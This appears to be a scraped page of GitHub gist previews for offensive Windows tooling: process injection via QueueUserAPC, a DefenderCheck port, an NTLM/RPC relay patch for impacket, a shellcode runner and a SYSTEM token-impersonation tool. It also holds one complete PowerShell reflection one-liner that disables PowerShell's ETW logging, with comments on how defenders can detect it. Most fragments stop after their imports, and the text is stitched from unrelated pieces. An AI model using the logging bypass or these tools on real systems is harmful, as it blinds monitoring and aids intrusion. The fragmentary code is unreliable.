jfmaes / DInjectQueuerAPC.cs
Created November 13, 2020 19:00
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
{
public class Program
daddycocoaman / pydefendercheck.py
Last active October 27, 2025 17:43
PyDefenderCheck
##################################################
## PyDefenderCheck - Python implementation of DefenderCheck
##################################################
## Author: daddycocoaman
## Based on: https://github.com/matterpreter/DefenderCheck
##################################################
import argparse
import enum
sploutchy / rpcrelayclientserver.patch
Created September 9, 2020 09:56
RPC Relay Client and Server Patch
From 53256e4b29331df20a5977b54c1741b2adc30394 Mon Sep 17 00:00:00 2001
From: root <[email protected]>
Date: Wed, 9 Sep 2020 11:54:00 +0200
Subject: [PATCH] RPC Relay client and server
---
examples/ntlmrelayx.py | 12 +-
impacket/dcerpc/v5/dcomrt.py | 30 +-
impacket/dcerpc/v5/rpcrt.py | 624 ++++++++++++++++--
.../examples/ntlmrelayx/attacks/rpcattack.py | 95 +++
# Reflection one-liner aimed at PowerShell's own ETW logging provider.
# It reads the non-public static field 'etwProvider' of
# System.Management.Automation.Tracing.PSEtwLogProvider, then writes 0 into the
# non-public instance field 'm_enabled' of that EventProvider object.
# NOTE(review): the apparent effect is that this process's PowerShell ETW provider
# stops emitting events, leaving a gap in any logging that depends on it. Confirm
# against the PowerShell/.NET version in use.
# Defender's view: reflection into these private members is the signal. The strings
# 'PSEtwLogProvider', 'etwProvider' and 'm_enabled' together in script content are
# worth alerting on. Presumably this statement is itself still recorded before it
# takes effect (verify), so an abrupt stop in a session's events right after it is
# a second indicator.
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace InjectionTest
{
public class DELEGATES
{
#!/usr/bin/env python3
import requests
import json
import urllib3
import sys
# SUPPRESS WARNINGS ############################################################
# Turns off urllib3's InsecureRequestWarning for the whole process. urllib3 emits
# that warning when an HTTPS request is made without certificate verification.
# NOTE(review): presumably the requests made later in this script pass verify=False
# (not visible here); confirm. With verification off, anyone on the network path can
# read or alter the traffic, and silencing the warning removes the only runtime hint
# that this is happening. Supplying a CA bundle is preferable to hiding the warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
LukeMathWalker / audit.yml
Last active October 14, 2025 13:21
GitHub Actions - Rust setup
name: Security audit
on:
schedule:
- cron: '0 0 * * *'
push:
paths:
- '**/Cargo.toml'
- '**/Cargo.lock'
jobs:
security_audit:
peewpw / shellcode_x64.py
Created May 12, 2020 16:03
64 bit Python3 compatible shellcode runner
# 64 bit compatible shellcode launcher
#
# The versions of this I've attempted to use appear to only work in 32bit Python (at least for 3.7-8).
# Hence why this was needed to solve a problem.
#
# based on work from:
# http://www.debasish.in/2012/04/execute-shellcode-using-python.html
# https://www.christophertruncer.com/shellcode-manipulation-and-injection-in-python-3/
# https://stackoverflow.com/a/61258392
#
using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Net;
using System.IO.Compression;
public class Payload
{
mvelazc0 / GetSystem.cs
Last active February 17, 2025 17:39
Escalates to SYSTEM by leveraging OpenProcess, OpenProcessToken and ImpersonateLoggedOnUser (MITRE ATT&CK T1134: https://attack.mitre.org/beta/techniques/T1134/). Must run as a high-integrity process and needs SeDebugPrivilege.
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;
//Based on https://0x00-0x00.github.io/research/2018/10/17/Windows-API-and-Impersonation-Part1.html
namespace GetSystem
{
class Program
{